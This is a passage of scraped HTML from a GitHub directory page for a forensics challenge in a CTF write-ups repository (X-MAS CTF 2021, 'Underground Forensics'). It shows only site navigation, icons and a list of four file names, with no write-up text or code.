0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> K1nd4SUS </span> <span>/</span> CTF-Writeups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>2</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>14</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/K1nd4SUS/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Pull requests Actions Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":352459850,"originating_url":"https://github.com/K1nd4SUS/CTF-Writeups/tree/main/X-MAS_CTF_2021/Underground%20Forensics","user_id":null}}" data-hydro-click-hmac="7be78ec05d8d6c7a7eb984a6769930c2e60e6d4905f9f8f11a60624885c28593"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>main</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/K1nd4SUS/CTF-Writeups/refs" cache-key="v0:1635795000.439816" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="SzFuZDRTVVMvQ1RGLVdyaXRldXBz" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/K1nd4SUS/CTF-Writeups/refs" cache-key="v0:1635795000.439816" current-committish="bWFpbg==" default-branch="bWFpbg==" name-with-owner="SzFuZDRTVVMvQ1RGLVdyaXRldXBz" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>X-MAS_CTF_2021</span></span><span>/</span>Underground Forensics<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>X-MAS_CTF_2021</span></span><span>/</span>Underground Forensics<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/K1nd4SUS/CTF-Writeups/tree-commit/5ba72293952deb3721808917281aa5132761f023/X-MAS_CTF_2021/Underground%20Forensics" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/K1nd4SUS/CTF-Writeups/file-list/main/X-MAS_CTF_2021/Underground%20Forensics"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>README.MD</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>UNK.BIN</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>u1.jpg</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>u2.png</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> <div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
